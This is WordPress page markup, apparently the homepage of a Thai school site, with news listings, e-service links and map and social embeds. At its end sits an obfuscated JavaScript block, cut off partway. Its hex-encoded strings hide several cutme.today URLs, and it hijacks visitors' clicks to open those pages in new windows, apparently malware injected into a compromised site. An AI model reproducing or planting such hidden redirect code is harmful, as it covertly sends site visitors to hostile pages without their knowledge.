/wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://pakheang.my.canva.site/docmentorderv2\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbyfuu5DE6Sug1gTORaEw1XTMD3zj82GVkMIkPseb_e71HZWAqbrLMuADBmWcyARoaNa/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 